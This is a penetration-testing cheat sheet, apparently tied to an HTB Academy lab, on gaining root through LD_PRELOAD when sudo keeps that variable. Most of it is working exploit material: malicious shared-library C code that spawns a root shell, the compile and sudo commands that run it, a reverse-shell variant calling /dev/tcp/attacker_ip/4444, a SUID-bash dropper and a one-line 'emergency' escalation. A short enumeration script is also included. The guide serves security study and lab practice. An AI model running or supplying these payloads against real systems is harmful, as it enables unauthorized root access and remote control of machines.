📚Shared Libraries

🎯 Overview

LD_PRELOAD environment variable allows loading custom shared libraries before program execution, enabling privilege escalation when combined with sudo configurations that preserve environment variables.

🔍 Prerequisites

Check for LD_PRELOAD in Sudo

# Check sudo configuration
sudo -l

# Look for env_keep+=LD_PRELOAD in output:
# env_keep+=LD_PRELOAD

# Example vulnerable entry:
# (root) NOPASSWD: /usr/sbin/apache2 restart

Library Dependencies Analysis

# View shared library dependencies
ldd /bin/ls
ldd /usr/sbin/apache2

# Check LD_PRELOAD current value
echo $LD_PRELOAD

🚀 LD_PRELOAD Exploitation

Create Malicious Library

# Create malicious shared library code
cat > root.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF

Compile Shared Library

# Compile as shared library
gcc -fPIC -shared -o root.so root.c -nostartfiles

# Verify compilation
file root.so
# Output: root.so: ELF 64-bit LSB shared object

Execute Privilege Escalation

# Use LD_PRELOAD with sudo command
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

# Should drop to root shell immediately
id
# uid=0(root) gid=0(root) groups=0(root)

🔧 Alternative Payloads

Reverse Shell Library

cat > revshell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    system("bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'");
}
EOF

gcc -fPIC -shared -o revshell.so revshell.c -nostartfiles
sudo LD_PRELOAD=/tmp/revshell.so /allowed/sudo/command

SUID Binary Creation

cat > suid.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    system("cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash");
}
EOF

gcc -fPIC -shared -o suid.so suid.c -nostartfiles
sudo LD_PRELOAD=/tmp/suid.so /allowed/sudo/command
/tmp/rootbash -p  # Execute SUID bash

🔍 Detection & Enumeration

LD_PRELOAD Vulnerability Check

#!/bin/bash
echo "=== LD_PRELOAD VULNERABILITY CHECK ==="

echo "[+] Checking sudo configuration for LD_PRELOAD:"
sudo -l 2>/dev/null | grep -i "LD_PRELOAD"

echo "[+] Current LD_PRELOAD value:"
echo $LD_PRELOAD

echo "[+] Available sudo commands with env_keep:"
sudo -l 2>/dev/null | grep -A 10 "env_keep.*LD_PRELOAD"

echo "[+] Compiler availability:"
which gcc g++ 2>/dev/null

Environment Variable Analysis

# Check all environment variables kept by sudo
sudo -l | grep "env_keep"

# Test LD_PRELOAD functionality
echo 'void _init(){system("echo LD_PRELOAD works");}' > test.c
gcc -fPIC -shared -o test.so test.c -nostartfiles
LD_PRELOAD=./test.so ls  # Should show "LD_PRELOAD works"

🔑 Quick Reference

Immediate Checks

# Check for LD_PRELOAD in sudo
sudo -l | grep "LD_PRELOAD"

# Available compilers
which gcc g++

# Sudo commands available
sudo -l | grep "NOPASSWD"

Emergency Exploitation

# Quick LD_PRELOAD escalation
echo 'void _init(){unsetenv("LD_PRELOAD");setuid(0);system("/bin/bash");}' > root.c
gcc -fPIC -shared -o root.so root.c -nostartfiles
sudo LD_PRELOAD=./root.so /allowed/sudo/command

HTB Academy Example

# 1. Check sudo configuration
sudo -l
# Look for: env_keep+=LD_PRELOAD

# 2. Create malicious library
gcc -fPIC -shared -o root.so root.c -nostartfiles

# 3. Execute with any allowed sudo command
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

# 4. Access flag
cat /root/ld_preload/flag.txt

⚠️ Exploitation Requirements

Must Have

• Sudo access to any command (even non-GTFOBin)

• env_keep+=LD_PRELOAD in sudoers configuration

• GCC compiler available on target system

• Write permissions in accessible directory

Common Scenarios

• Non-exploitable sudo commands with LD_PRELOAD kept

• Service restart permissions (apache, nginx, etc.)

• Safe commands made dangerous by LD_PRELOAD

• Custom applications with sudo permissions

---

LD_PRELOAD exploitation transforms safe sudo commands into privilege escalation vectors - environment variable preservation combined with shared library injection bypasses command restrictions for immediate root access.